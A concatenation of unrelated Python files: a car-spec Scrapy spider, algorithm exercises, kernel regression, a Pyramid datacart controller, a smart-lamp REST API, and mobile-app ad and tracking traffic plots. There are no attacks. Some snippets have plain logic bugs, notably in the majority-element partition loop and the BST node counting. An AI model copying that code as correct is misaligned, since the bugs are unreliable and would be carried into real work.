url = f'https://www.chexiu.com/option/{vehicle_id}.html'
yield scrapy.Request(url=url, callback=self.parse_vehicle,
meta={"info": (brand_id, brandname, family_id, familyname, vehicle_id, vehicle)})
def parse_vehicle(self, response):
item = dict()
brand_id, brandname, family_id, familyname, vehicle_id, vehicle = response.meta.get('info')
url = response.url
info = {}
trs = response.xpath('//tr')
for tr in trs:
tds = tr.xpath('.//td[position()<3]//text()')
td = tds.extract()
# print(td)
try:
name = td[0]
value = td[1]
information = {name: value}
info.update(information)
except:
pass
# print(info)
factoryname = info['厂商']
guideprice = info['厂商指导价(元)']
try:
engine = info['发动机']
except:
engine = None
try:
transmission = info['变速箱']
except:
transmission = None
try:
car_structure = info['车身结构']
except:
car_structure = None
try:
car_door = info['车门数(个)']
except:
car_door = None
try:
car_seat = info['座位数(个)']
except:
car_seat = None
try:
displacement = info['排量(L)']
except:
displacement = None
try:
air_intake = info['进气形式']
except:
air_intake = None
try:
fuel = info['燃料形式']
except:
fuel = None
try:
environmental_protection_standard = info['环保标准']
except:
environmental_protection_standard = None
try:
transmission_type = info['变速箱类型']
except:
transmission_type = None
try:
drive_way = info['驱动方式']
except:
drive_way = None
item['brandname'] = brandname
item['brand_id'] = brand_id
item['familyname'] = familyname
item['family_id'] = family_id
item['vehicle'] = vehicle
item['vehicle_id'] = vehicle_id
item['factoryname'] = factoryname
item['guideprice'] = guideprice
item['engine'] = engine
item['transmission'] = transmission
item['car_structure'] = car_structure
item['car_door'] = car_door
item['car_seat'] = car_seat
item['displacement'] = displacement
item['air_intake'] = air_intake
item['fuel'] = fuel
item['environmental_protection_standard'] = environmental_protection_standard
item['transmission_type'] = transmission_type
item['drive_way'] = drive_way
item['info'] = info
item['url'] = response.url
item['grab_time'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
item['status'] = url + '-' + guideprice
yield item
|
x = 5
Name = "Python"
if Name.startswith("P"):
print("Start With P")
if "o" in Name:
print("Yes")
if "o" in Name and "Q":
print("Yes")
|
import graphene
import schedules.schema
class Query(schedules.schema.Query, graphene.ObjectType):
pass
class Mutation(schedules.schema.Mutation, graphene.ObjectType):
pass
schema = graphene.Schema(query=Query, mutation=Mutation) |
def moreThanHalf(l):
if(len(l) == 0):
return False
middle = len(l)>>1
start = 0
end = len(l)-1
index = partition(l, start, end)
while(index != middle):
if(index > middle):
end = index-1
index = partition(l,start,end)
if(index < middle):
end = index+1
index = partition(l,start,end)
result = l[index]
if(not checkRight(l, result)):
return False
return result
def partition(l, start, end):
pivot = l[end]
i = start-1
#i记录当前索引以后比pivot大的第一个数数
#遍历从start到end的数,如果都比pivot的小则i和j一直相等,相当于没交换,直到碰到第一个比pivot大的数
#此时i指向比pivot小的最后一个数,j指向其后第一个比pivot大的数,交换彼此
#遍历结束后i指向比pivot小的最后一个数,加1后与pivot交换
for j in range(start, end):
if(l[j] <= pivot):
i += 1
l[i], l[j] = l[j], l[i]
l[i+1], l[end] = l[end], l[i+1]
return i+1
def checkRight(l, result):
cnt = 0
for i in range(len(l)):
if(l[i] == result):
cnt += 1
if(cnt * 2 <= len(l)):
return False
return True
def moreThanHalf2(l):
if(len(l) == 0):
return False
result = l[0]
cnt = 1
for i in range(1, len(l)):
if(cnt == 0):
result = l[i]
cnt = 1
elif(l[i] == result):
cnt += 1
else:
cnt -= 1
if (not checkRight(l, result)):
return False
return result
if __name__ == '__main__':
l = [1,2,3,2,2,2,5,4,2]
print(moreThanHalf(l))
print(moreThanHalf2(l))
l2 = [1]
print(moreThanHalf(l2))
l3 = []
print(moreThanHalf(l3))
|
class Node:
def __init__(self, data):
self.data = data
self.left = None
self.right = None
self.nodeCount = 0
#function to insert elements into the BST
def insert(root,val):
if root is None:
return Node(val)
else:
if root.data == val:
return root
elif root.data>val:
root.left=insert(root.left,val)
root.nodeCount+=1
else:
root.right=insert(root.right,val)
return root
#function to find the kth smallest element
def kthSmallest(root, k):
if (root == None):
return None
count = root.nodeCount + 1
if (count == k):
return root
if (count > k):
return kthSmallest(root.left, k)
return kthSmallest(root.right, k - count)
root =Node(5)
insert(root,4)
insert(root,3)
insert(root,2)
insert(root,1)
insert(root,6)
insert(root,7)
insert(root,8)
k=int(input("Enter k:"))
ans=kthSmallest(root,k)
print("The",k,"th smallest element is:",ans.data)
|
# -*- coding: utf-8 -*-
import numpy as np
import regressionData as rg
import time
import pdb
#-------------------
# クラスの定義始まり
class linearRegression():
#------------------------------------
# 1) 学習データおよびモデルパラメータの初期化
# x: 学習入力データ(入力ベクトルの次元数×データ数のnumpy.array)
# y: 学習出力データ(データ数のnumpy.array)
# kernelType: カーネルの種類(文字列:gaussian)
# kernelParam: カーネルのハイパーパラメータ(スカラー)
def __init__(self, x, y, kernelType="linear", kernelParam=1.0):
# 学習データの設定
self.x = x
self.y = y
self.xDim = x.shape[0]
self.dNum = x.shape[1]
# カーネルの設定
self.kernelType = kernelType
self.kernelParam = kernelParam
#------------------------------------
#------------------------------------
# 2) 最小二乗法を用いてモデルパラメータを最適化
# (分母の計算にFor文を用いた場合)
# def train(self):
# self.w = np.zeros([self.xDim,1])
#------------------------------------
#------------------------------------
def train(self):
x = np.insert(self.x,self.x.shape[0],1,axis=0)
l = np.linalg.inv(np.dot(x,x.T))
r = np.dot(x,self.y.T)
self.w = np.dot(l,r)
#------------------------------------
#------------------------------------
# 2) 最小二乗法を用いてモデルパラメータを最適化(行列演算により高速化)
def trainMat(self):
x = np.insert(self.x,self.x.shape[0],1,axis=0)
l = np.linalg.inv(np.dot(x,x.T))
r = np.dot(x,self.y.T)
self.w = np.dot(l,r)
#self.w = np.zeros([self.xDim,1])
#------------------------------------
#------------------------------------
# 3) 予測
# x: 入力データ(入力次元 x データ数)
def predict(self,x):
x1 = np.insert(x,x.shape[0],1,axis=0)
y = np.dot(self.w.T,x1)
return y
#------------------------------------
#------------------------------------
# 4) 二乗損失の計算
# x: 入力データ(入力次元 x データ数)
# y: 出力データ(データ数)
def loss(self,x,y):
preY = self.predict(x)
loss = np.sum((y-preY)*(y-preY))/len(y)
return loss
#------------------------------------
#------------------------------------
# 6) 2つのデータ集合間の全ての組み合わせの距離の計算
# x: 行列(次元 x データ数)
# z: 行列(次元 x データ数)
def calcDist(self,x,z):
#【行列xのデータ点x1, x2, ..., xNと、行列zのデータ点z1, z2, ..., zMとの間のMxN個の距離を計算】
#xTile = np.tile(x,(x.shape[0],z.shape[1],1))
#zTile = np.tile(z.T,(z.shape[0],1,x.shape[1]))
#dist = abs(xTile.T-zTile.T)
#return dist
return np.sqrt(((x[:, :,np.newaxis] - z[:, np.newaxis,:]) ** 2).sum(axis=0))
#------------------------------------
#------------------------------------
# 5) カーネルの計算
# x: カーネルを計算する対象の行列(次元 x データ数)
def kernel(self,x):
#【self.xの各データ点xiと行列xの各データ点xjと間のカーネル値k(xi,xj)を各要素に持つグラム行列を計算】
ker = self.calcDist(self.x,x)
K = np.exp(-pow(ker,2)/(2*pow(self.kernelParam,2)))
return K
#return np.exp(-(self.calcDist(x, self.x) ** 2 / (2 * self.kernelParam ** 2)))
#------------------------------------
#------------------------------------
def trainMatKernel(self):
tKer = self.kernel(self.x)
x = np.insert(tKer,tKer.shape[0],1,axis=0)
ramda = 0.01
i = np.eye(x.shape[0])
l = np.linalg.inv(np.dot(x,x.T)+ramda*i)
r = np.dot(x,self.y.T)
self.w = np.dot(l,r)
#self.w = np.zeros([self.xDim,1])
#------------------------------------
# クラスの定義終わり
#-------------------
#-------------------
# メインの始まり
if __name__ == "__main__":
#------------------------------------
#liner
# 1) 学習入力次元が2の場合のデーター生成
myData = rg.artificial(200,100, dataType="1D")
#myData = rg.artificial(200,100, dataType="1D",isNonlinear=True)
# 2) 線形回帰モデル
regression = linearRegression(myData.xTrain,myData.yTrain)
#regression = linearRegression(myData.xTrain,myData.yTrain,kernelType="gaussian",kernelParam=1)
# 3) 学習(For文版)
sTime = time.time()
regression.train()
eTime = time.time()
print("train with for-loop: time={0:.4} sec".format(eTime-sTime))
# 4) 学習(行列版)
sTime = time.time()
regression.trainMat()
eTime = time.time()
print("train with matrix : time={0:.4} sec".format(eTime-sTime))
# 5) 学習したモデルを用いて予測
print("loss={0:.3}".format(regression.loss(myData.xTest,myData.yTest)))
# 6) 学習・評価データおよび予測結果をプロット
predict = regression.predict(myData.xTest)
#myData.plot(predict,isTrainPlot=False)
myData.plot(predict)
#------------------------------------
#2次元
# 1) 学習入力次元が2の場合のデーター生成
myData = rg.artificial(200,100, dataType="2D")
#myData = rg.artificial(200,100, dataType="2D",isNonlinear=True)
# 2) 線形回帰モデル
regression = linearRegression(myData.xTrain,myData.yTrain)
#regression = linearRegression(myData.xTrain,myData.yTrain,kernelType="gaussian",kernelParam=1)
# 4) 学習(行列版)
sTime = time.time()
regression.trainMat()
eTime = time.time()
print("train with matrix : time={0:.4} sec".format(eTime-sTime))
# 5) 学習したモデルを用いて予測
print("loss={0:.3}".format(regression.loss(myData.xTest,myData.yTest)))
# 6) 学習・評価データおよび予測結果をプロット
predict = regression.predict(myData.xTest)
#myData.plot(predict,isTrainPlot=False)
myData.plot(predict)
#------------------------------------
#Kernel
# 1) 学習入力次元が2の場合のデーター生成
myData = rg.artificial(200,100, dataType="1D",isNonlinear=True)
# 2) 線形回帰モデル
regression = linearRegression(myData.xTrain,myData.yTrain,kernelType="gaussian",kernelParam=1)
# 4) 学習
regression.trainMatKernel()
# 5) 学習したモデルを用いて予測
print("loss={0:.3}".format(regression.loss(regression.kernel(myData.xTest),myData.yTest)))
# 6) 学習・評価データおよび予測結果をプロット
predict = regression.predict(regression.kernel(myData.xTest))
myData.plot(predict,isTrainPlot=False)
#------------------------------------
#Kernel2
# 1) 学習入力次元が2の場合のデーター生成
myData = rg.artificial(200,100, dataType="1D",isNonlinear=True)
# 2) 線形回帰モデル
regression = linearRegression(myData.xTrain,myData.yTrain,kernelType="gaussian",kernelParam=0.1)
# 4) 学習
regression.trainMatKernel()
# 5) 学習したモデルを用いて予測
print("loss={0:.3}".format(regression.loss(regression.kernel(myData.xTest),myData.yTest)))
# 6) 学習・評価データおよび予測結果をプロット
predict = regression.predict(regression.kernel(myData.xTest))
myData.plot(predict,isTrainPlot=False)
#------------------------------------
#Kernel3
# 1) 学習入力次元が2の場合のデーター生成
myData = rg.artificial(200,100, dataType="1D",isNonlinear=True)
# 2) 線形回帰モデル
regression = linearRegression(myData.xTrain,myData.yTrain,kernelType="gaussian",kernelParam=5)
# 4) 学習
regression.trainMatKernel()
# 5) 学習したモデルを用いて予測
print("loss={0:.3}".format(regression.loss(regression.kernel(myData.xTest),myData.yTest)))
# 6) 学習・評価データおよび予測結果をプロット
predict = regression.predict(regression.kernel(myData.xTest))
myData.plot(predict,isTrainPlot=False)
#メインの終わり
#-------------------
|
"""Datacart controller.
"""
from datetime import datetime
from copy import copy
from StringIO import StringIO
from zipfile import ZipFile, ZIP_DEFLATED
from logging import getLogger
from traceback import format_exc
log = getLogger(__name__)
from pyramid.response import Response
from pyramid.renderers import render_to_response
from pyramid.httpexceptions import (
HTTPBadRequest, HTTPMethodNotAllowed, HTTPNotFound, HTTPSeeOther)
from webhelpers.text import plural
from tempfilezipstream import (
TempFileStreamingZipFile, FileWrapper, ZIP_DEFLATED)
from pycchdo.views import *
from pycchdo.models.datacart import Datacart
from pycchdo.models.serial import store_context, Change, Cruise
ZIP_FILE_LIMIT = 20
TEMPNAME = 'cchdo_datacart_{0}.zip'
def get_datacart(request):
"""Retrieve the datacart from the session or create a new one."""
try:
return request.session['datacart']
except KeyError:
request.session['datacart'] = Datacart()
return request.session['datacart']
def _redirect_back_or_default(request):
if request.referrer:
return HTTPSeeOther(location=request.referrer)
else:
return HTTPSeeOther(location=request.route_path('datacart'))
def _json_response(obj):
resp = render_to_response('json', obj)
resp.content_type = 'application/json'
return resp
def index(request):
return {'ZIP_FILE_LIMIT': ZIP_FILE_LIMIT}
def add(request):
try:
id = request.params['id']
except (KeyError, ValueError):
raise HTTPNotFound()
dattr = Change.query().get(id)
if not dattr:
request.session.flash('Error adding file to data cart.', 'error')
raise HTTPNotFound()
request.datacart.add(dattr.id)
if request.is_xhr:
return _json_response({'cart_count': len(request.datacart)})
else:
request.session.flash(
'Added {0} to data cart'.format(dattr.value.name), 'success')
return _redirect_back_or_default(request)
def remove(request):
try:
id = request.params['id']
except (KeyError, ValueError):
raise HTTPNotFound()
dattr = Change.query().get(id)
if not dattr:
request.session.flash('Error removing file from data cart.', 'error')
raise HTTPNotFound()
request.datacart.remove(dattr.id)
if request.is_xhr:
return _json_response({'cart_count': len(request.datacart)})
else:
request.session.flash(
'Removed {0} from data cart'.format(dattr.value.name), 'success')
return _redirect_back_or_default(request)
def add_cruise(request):
try:
cruise_id = request.params['id']
except KeyError:
raise HTTPNotFound()
file_count, count_diff = _add_single_cruise(request, cruise_id)
if request.is_xhr:
return _json_response(
{'cart_count': len(request.datacart), 'diff': count_diff})
else:
message = "Added {0} to data cart".format(
plural(count_diff, 'file', 'files'))
present_count = file_count - count_diff
if present_count > 0:
message += " ({0} already present).".format(present_count)
else:
message += "."
request.session.flash(message, 'notice')
return _redirect_back_or_default(request)
def remove_cruise(request):
try:
cruise_id = request.params['id']
except KeyError:
raise HTTPNotFound()
file_count, count_diff = _remove_single_cruise(request, cruise_id)
if request.is_xhr:
return _json_response(
{'cart_count': len(request.datacart), 'diff': count_diff})
else:
message = "Removed {0} from data cart".format(
plural(count_diff, 'file', 'files'))
present_count = file_count - count_diff
if present_count > 0:
message += " ({0} not present).".format(present_count)
else:
message += "."
request.session.flash(message, 'notice')
return _redirect_back_or_default(request)
def add_cruises(request):
try:
cruise_ids = request.params.getall('ids')
except KeyError:
raise HTTPNotFound()
log.debug(cruise_ids)
file_count_all = 0
count_diff_all = 0
for id in cruise_ids:
try:
file_count, count_diff = _add_single_cruise(request, id)
except HTTPNotFound:
file_count = 0
count_diff = 0
file_count_all += file_count
count_diff_all += count_diff
if request.is_xhr:
return _json_response(
{'cart_count': len(request.datacart), 'diff': count_diff})
else:
message = "Added {0} to datacart".format(
plural(count_diff_all, 'file', 'files'))
present_count = file_count_all - count_diff_all
if present_count > 0:
message += " ({0} already present).".format(present_count)
else:
message += "."
request.session.flash(message, 'success')
return _redirect_back_or_default(request)
def remove_cruises(request):
try:
cruise_ids = request.params.getall('ids')
except KeyError:
raise HTTPNotFound()
file_count_all = 0
count_diff_all = 0
for id in cruise_ids:
try:
file_count, count_diff = _remove_single_cruise(request, id)
except HTTPNotFound:
file_count = 0
count_diff = 0
file_count_all += file_count
count_diff_all += count_diff
if request.is_xhr:
return _json_response(
{'cart_count': len(request.datacart), 'diff': count_diff})
else:
message = "Removed {0} from datacart".format(
plural(count_diff_all, 'file', 'files'))
present_count = file_count_all - count_diff_all
if present_count > 0:
message += " ({0} not present).".format(present_count)
else:
message += "."
request.session.flash(message, 'success')
return _redirect_back_or_default(request)
def clear(request):
method = http_method(request)
if method != 'POST':
raise HTTPMethodNotAllowed()
try:
del request.session['datacart']
except KeyError:
pass
if request.is_xhr:
return _json_response({'cart_count': 0})
else:
request.session.flash('Cleared data cart', 'success')
return _redirect_back_or_default(request)
def _add_single_cruise(request, cruise_id):
try:
cruise_obj = Cruise.query().get(cruise_id)
if cruise_obj is None:
raise ValueError()
except ValueError:
request.session.flash(
'Error adding cruise {0} dataset from data cart'.format(
cruise_id), 'error')
raise HTTPNotFound()
before_count = len(request.datacart)
mapped_files = cruise_obj.file_attrs
file_count = 0
for ftype, fattr in mapped_files.items():
if not Datacart.is_file_type_allowed(ftype):
continue
request.datacart.add(fattr.id)
file_count += 1
after_count = len(request.datacart)
count_diff = after_count - before_count
return (file_count, count_diff)
def _remove_single_cruise(request, cruise_id):
try:
cruise_obj = Cruise.query().get(cruise_id)
except ValueError:
request.session.flash(
'Error removing cruise dataset from data cart', 'error')
raise HTTPNotFound()
before_count = len(request.datacart)
mapped_files = cruise_obj.file_attrs
file_count = 0
for ftype, fattr in mapped_files.items():
if not Datacart.is_file_type_allowed(ftype):
continue
try:
request.datacart.remove(fattr.id)
except KeyError:
pass
file_count += 1
after_count = len(request.datacart)
count_diff = before_count - after_count
return (file_count, count_diff)
class ChangeFileWrapper(FileWrapper):
EMPTY_FILE = StringIO('missing, contact the CCHDO')
def __init__(self, arcname, fileobj):
super(ChangeFileWrapper, self).__init__(arcname, fileobj)
self._fobj = None
@property
def fobj(self):
if self._fobj is None:
try:
self._fobj = self.__fobj.open_file()
except (OSError, IOError) as err:
self._fobj = copy(self.EMPTY_FILE)
log.error(u'Missing file {0} {1!r}'.format(self.__fobj, err))
except Exception as error:
log.error(repr(error))
return self._fobj
@fobj.setter
def fobj(self, value):
self.__fobj = value
self._fobj = None
@fobj.deleter
def fobj(self):
del self.__fobj
self._fobj = None
def __repr__(self):
return u'ChangeFileWrapper({0}, {1!r})'.format(self.arcname, self.fobj)
def download(request):
method = http_method(request)
if method != 'POST':
raise HTTPMethodNotAllowed()
try:
archive = request.params['archive']
except KeyError:
raise HTTPBadRequest()
try:
ids = map(int, archive.split(','))
except (AttributeError, ValueError):
raise HTTPBadRequest()
def app_iter():
try:
attrs = Change.get_all_by_ids(*ids)
zstream = TempFileStreamingZipFile([])
for attr in attrs:
dfile = attr.value
zstream.write(ChangeFileWrapper(dfile.name, dfile),
compress_type=ZIP_DEFLATED)
except Exception as exc:
log.error(u'Unable to bulk download {0} {1}'.format(
format_exc(exc), ids))
return
else:
with store_context(request.fsstore):
for chunk in iter(zstream):
yield chunk
fname = TEMPNAME.format(datetime.now().strftime('%FT%T'))
return Response(
app_iter=app_iter(),
content_type='application/zip',
content_disposition='attachment; filename={0}'.format(fname))
|
import json
from flask_restful import Resource
from tinytuya import BulbDevice
from utils import clamp_color, clamp_value, get_tuya_power_status
class Lamp:
def __init__(self):
with open("data/lamp.json") as f:
tuya_data = json.load(f)
self.bulb = BulbDevice(tuya_data["device_id"], tuya_data["ip"], tuya_data["local_key"])
self.bulb.set_version(3.3)
def get_status(self):
state = self.bulb.state()
r, g, b = self.bulb.colour_rgb() if state["mode"] == "colour" else (255, 255, 255)
return {
"power": "on" if state["is_on"] else "off",
"brightness": int((state["brightness"] / 255) * 100),
"color": {
"red": r, "green": g, "blue": b
}
}
def set_power(self, status:str):
if status == "on":
self.bulb.turn_on()
elif status == "off":
self.bulb.turn_off()
else:
if get_tuya_power_status(self.bulb, 1) == "on":
self.bulb.turn_off()
else:
self.bulb.turn_on()
return { "message": "Lamp toggled." }
return { "message": f"Lamp turned {status}." }
def set_color(self, red:int, green:int, blue:int):
red, green, blue = clamp_color(red, green, blue)
if red == 255 and green == 255 and blue == 255:
self.bulb.set_colourtemp(128)
else:
self.bulb.set_colour(red, green, blue)
if get_tuya_power_status(self.bulb, 1) == "off":
self.bulb.turn_on()
return { "message": f"Lamp color set to ({red}, {green}, {blue})." }
def set_brightness(self, brightness:int):
if self.bulb.status()["dps"]["2"] == "white":
self.bulb.set_brightness_percentage(clamp_value(brightness, 0, 100))
message = f"Lamp brightness set to {brightness}%."
else:
message = "Setting lamp brightness is only possible in white mode."
if get_tuya_power_status(self.bulb, 1) == "off":
self.bulb.turn_on()
return { "message": message }
class LampStatus(Resource):
def get(self):
return Lamp().get_status()
class LampPower(Resource):
def get(self, status:str):
return Lamp().set_power(status)
class LampColor(Resource):
def get(self, red:int, green:int, blue:int):
return Lamp().set_color(red, green, blue)
class LampBrightness(Resource):
def get(self, brightness:int):
return Lamp().set_brightness(brightness)
|
class Solution(object):
def fib(self, n):
"""
:type n: int
:rtype: int
"""
if n < 2:
return n
a, b = 0, 1
for _ in range(2, n + 1):
b, a = a + b, b
return b % 1000000007
def fib(self, n):
if n <= 1:
return n
a, b = 0, 1
for i in range(2, n + 1):
b, a = a + b, b
return b
if __name__ == "__main__":
s = Solution()
for i in range(9):
print('fib %d: %d' %(i, s.fib(i)))
|
import pandas as p
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import time
import datetime
import math
from matplotlib import rcParams
rcParams.update({'figure.autolayout': True})
p.options.mode.chained_assignment = None
phone_ip = "192.168.137.186"
phone_ip2 = "192.168.137.46"
phone_ip3 = "192.168.137.21"
sns.set_style("darkgrid")
sns.set_context('talk')
sns.set_palette("Set1")
ALPHA = 0.7
title_font = {'fontname': 'Arial', 'size': '20', 'color': 'black', 'weight': 'normal',
'verticalalignment': 'bottom'} # Bottom vertical alignment for more space
axis_font = {'fontname': 'Arial', 'size': '16', 'color': 'black', 'weight': 'normal'} # Bottom vertical alignment for more space
label_font = {'fontname': 'Arial', 'size': '12', 'color': 'black', 'weight': 'normal'}
all_apps = ["com.tubitv", "com.wayfair.wayfair", "io.voodoo.crowdcity", "com.sausageflip.game", "com.pinterest"]
# all_apps = ["io.voodoo.crowdcity"]
no_http = ["com.sausageflip.game"]
############################################
# HELPER STUFF #
############################################
def distribute_time(all_dfs):
all_times = []
for df in all_dfs:
all_times += list(df["Time"])
all_times = sorted(list(dict.fromkeys(all_times)))
start = p.to_datetime(min(all_times))
end = p.to_datetime(max(all_times))
times = []
while(start <= end):
times.append(start.strftime("%H:%M"))
start = start + p.Timedelta(minutes=1)
time_range = p.DataFrame({'Time': times})
cleaned = []
for frame in all_dfs:
clean = p.concat([time_range, frame], join="outer", sort=False)
clean.drop_duplicates(subset=['Time'], keep='last', inplace=True)
clean.sort_values(by=['Time'], inplace = True)
clean = clean.reset_index().drop('index', axis=1)
cleaned.append(clean)
return cleaned
def get_all_dfs(dataset, column):
service_types = list(dataset[column].index.levels[0])
all_dfs = []
if 'benign' in service_types:
benign = dataset[column]['benign'].reset_index().rename(columns={
column: "Benign"})
all_dfs.append(benign)
if 'ad' in service_types:
ads = dataset[column]['ad'].reset_index().rename(
columns={column: "Advertisements"})
all_dfs.append(ads)
if 'telemetry' in service_types:
telemetry = dataset[column]['telemetry'].reset_index().rename(columns={
column: "Tracking"})
all_dfs.append(telemetry)
# if 'tracking' in service_types:
# tracking = dataset[column]['tracking'].reset_index().rename(columns={
# column: "Tracking"})
# all_dfs.append(tracking)
if 'ad,tracking' in service_types:
both = dataset[column]['ad,tracking'].reset_index().rename(columns={
column: "Both"})
all_dfs.append(both)
return all_dfs
def colour_lines(all_dfs):
colours = []
palette = sns.color_palette()
for df in all_dfs:
column = df.columns[1]
if(column == "Benign"):
colours.append(palette[2])
elif(column == "Advertisements"):
colours.append(palette[0])
elif(column == "Tracking"):
colours.append(palette[1])
else:
colours.append(palette[3])
return colours
def clean_package_name(package_name):
shortened = ""
if(not p.isnull(package_name)):
parts = package_name.split('.')
if(parts[2] == 'apk'):
shortened = parts[1]
else:
shortened = parts[1] + "." + parts[2]
return shortened
def get_graph_name(sheet, app_name, graph_name):
app_name = app_name.replace('.','-')
if(sheet != ""):
name = "./graphs/v3/" + app_name + "_" + graph_name + "(" + sheet + ").png"
else:
name = "./graphs/v3/" + app_name + "_" + graph_name + ".png"
return name
############################################
# HTTPS STUFF #
############################################
def ips_over_time(path, sheet, app_name):
df = p.read_excel(path, index_col=None, sheet_name=sheet)
df['timestamp'] = p.to_datetime(df['timestamp'], unit='s')
df['Time'] = df["timestamp"].dt.strftime("%H:%M")
destination = df[(df['dst ip'] != phone_ip) & (df['dst ip'] != phone_ip2) & (df['dst ip'] != phone_ip3)]['dst ip']
source = df[(df['src ip'] != phone_ip) & (df['src ip'] != phone_ip2) & (df['src ip'] != phone_ip3)]['src ip']
both = (destination.append(source)).to_frame()
both.sort_index(inplace=True)
df.drop(['src ip', 'dst ip'], axis=1, inplace=True)
# print(both)
df['src/dst'] = both
df = (df.groupby(['service', 'Time'])['src/dst'].nunique()).to_frame()
def create_graph(dataset, column):
fig, ax = plt.subplots(figsize=(11, 7))
service_types = list(dataset[column].index.levels[0])
all_dfs = get_all_dfs(dataset, column)
cleaned = distribute_time(all_dfs)
colours = colour_lines(cleaned)
i = 0
for frame in cleaned:
type = frame[frame.columns[1]].name
ax.plot(frame['Time'], frame[type], '-o', alpha=ALPHA, color=colours[i])
i += 1
ax.set_xticklabels(range(0, 16))
plt.title("Total Number of Unique IP Connections over " +
sheet)
plt.xlabel("Time (in minutes)")
plt.ylabel("Total Number of Unique IP Connections")
ax.yaxis.set_major_formatter(plt.FormatStrFormatter('%d'))
plt.legend(fontsize=12)
create_graph(df, "src/dst")
# plt.show()
plt.savefig(get_graph_name(sheet, app_name, "unique_ip_responses"))
# get_graph_name(sheet, app_name, graph_name)
def frames_over_time(path, sheet, app_name):
df = p.read_excel(path, index_col=None, sheet_name = sheet)
df['timestamp'] = p.to_datetime(df['timestamp'], unit='s')
df['Time'] = df["timestamp"].dt.strftime("%H:%M")
def create_graph(dataset):
column = 'frame size'
dataset = dataset.groupby(['service', 'Time'])[column].sum()
dataset = dataset.to_frame()
fig, ax = plt.subplots(figsize=(11, 7))
all_dfs = get_all_dfs(dataset, column)
cleaned = distribute_time(all_dfs)
colours = colour_lines(cleaned)
i = 0
for frame in cleaned:
type = frame[frame.columns[1]].name
ax.plot(frame['Time'], frame[type], '-o', alpha=ALPHA, color=colours[i])
i += 1
ax.set_xticklabels(range(0,16))
plt.title("Total Traffic Sent over " + sheet)
plt.xlabel("Time (in minutes)")
plt.ylabel("Total Traffic Sent (in bytes)")
ax.yaxis.set_major_formatter(plt.FormatStrFormatter('%d'))
plt.legend(fontsize=12)
create_graph(df)
# plt.savefig("./graphs/v3/" + sheet + "_traffic_(" + app_name + ").png")
plt.savefig(get_graph_name(sheet, app_name, "traffic"))
############################################
# HTTP STUFF #
############################################
def domains_over_time(path, sheet, app_name):
df = p.read_excel(path, index_col=None, sheet_name=sheet)
df['timestamp'] = p.to_datetime(df['timestamp'], unit='s')
df['Time'] = df["timestamp"].dt.strftime("%H:%M")
def create_graph(dataset):
dataset = dataset.groupby(['service', 'Time'])['domain'].nunique()
dataset = dataset.to_frame()
column = 'domain'
fig, ax = plt.subplots(figsize=(11, 7))
service_types = list(dataset[column].index.levels[0])
all_dfs = get_all_dfs(dataset, column)
cleaned = distribute_time(all_dfs)
colours = colour_lines(cleaned)
i = 0
for frame in cleaned:
type = frame[frame.columns[1]].name
ax.plot(frame['Time'], frame[type], '-o', alpha=ALPHA, color=colours[i])
i += 1
ax.set_xticklabels(range(0, 16))
plt.title("Total Domain Connections over " + sheet)
plt.xlabel("Time (in minutes)")
plt.ylabel("Total Domains Connections")
ax.yaxis.set_major_formatter(plt.FormatStrFormatter('%d'))
plt.legend(fontsize=12)
create_graph(df)
# plt.savefig("./graphs/v3/" + sheet + "_domain_number_(" + app_name + ").png")
plt.savefig(get_graph_name(sheet, app_name, "domain_number"))
def https_vs_http(path, app_name):
http = p.read_excel(path, index_col=None, sheet_name='HTTP')
https = p.read_excel(path, index_col=None, sheet_name='HTTPS')
http['timestamp'] = p.to_datetime(http['timestamp'], unit='s')
https['timestamp'] = p.to_datetime(https['timestamp'], unit='s')
http['Time'] = http["timestamp"].dt.strftime("%H:%M")
https['Time'] = https["timestamp"].dt.strftime("%H:%M")
http = http.groupby(['Time'])['frame size'].sum().to_frame().reset_index()
https = https.groupby(['Time'])['frame size'].sum().to_frame().reset_index()
http.columns = ['Time', 'HTTP Frame Size']
https.columns = ['Time', 'HTTPS Frame Size']
http, https = distribute_time([http, https])
both = http.merge(https)
fig, ax = plt.subplots(figsize=(11, 7))
both.plot(ax=ax, secondary_y=['HTTPS Frame Size'], style='-o', alpha=ALPHA)
plt.title("HTTP Traffic VS HTTPS Traffic over Time")
ax.set_xlabel("Time (in minutes)")
ax.set_ylabel('Total Traffic over HTTP (in bytes)')
ax.right_ax.set_ylabel('Total Traffic over HTTPS (in bytes)')
ax.yaxis.set_major_formatter(plt.FormatStrFormatter('%d'))
ax.right_ax.yaxis.set_major_formatter(plt.FormatStrFormatter('%d'))
ax.set_xticklabels(range(0, 16))
ax.set_xticks(range(0, 16))
lines = ax.get_lines() + ax.right_ax.get_lines()
ax.legend(lines, [l.get_label() for l in lines], loc='upper right', fontsize=12)
# plt.savefig("./graphs/v3/http_vs_https_(" + app_name + ").png")
plt.savefig(get_graph_name("", app_name, "http_vs_https"))
# plt.show()
def benign_domains(path, app_name):
df = p.read_excel(path, index_col=None, sheet_name='HTTPS')
benign = df[df['service'] == 'benign']
benign = benign[benign.domain.notnull()]
print(benign)
############################################
# EITHER STUFF #
############################################
def get_all_domains(path, app_name):
df = p.read_excel(path, index_col=None, sheet_name='HTTP')
df2 = p.read_excel(path, index_col=None, sheet_name='HTTPS')
all_domains = list(df['domain'].dropna()) + list(df2['domain'].dropna())
domain_class1 = df[['domain', 'service']]
domain_class2 = df2[['domain', 'service']]
domain_class = (domain_class1.append(domain_class2)).drop_duplicates().reset_index()
domain_class.drop(['index'], axis=1, inplace=True)
domain_dict = {}
for domain in all_domains:
if domain in domain_dict:
domain_dict[domain] += 1
else:
domain_dict[domain] = 1
df = p.DataFrame.from_dict(domain_dict, orient='index')
df.reset_index(inplace=True)
df.columns = ['domain','Count']
df = df.merge(domain_class)
df.columns = ['Domain', 'Count', 'Service']
df.sort_values(by='Count', inplace=True, ascending=False)
df.set_index('Domain', inplace=True)
# print(df.head(10))
print(df.head(10).to_latex())
def sum_domain(path, app_name, domain):
df_http = p.read_excel(path, index_col=None, sheet_name="HTTP")
df_https = p.read_excel(path, index_col=None, sheet_name="HTTPS")
both = df_http.append(df_https)
domain_df = both[both['domain'] == domain]
print(sum(domain_df['frame size']))
def non_benign_domains(path, app_name):
df_http = p.read_excel(path, index_col=None, sheet_name="HTTP")
df_https = p.read_excel(path, index_col=None, sheet_name="HTTPS")
both = df_http.append(df_https)
both.drop((both[both['service'] == 'benign'].index), inplace=True)
both = both.groupby('domain')['frame size'].sum()
both.sort_values(inplace=True, ascending=False)
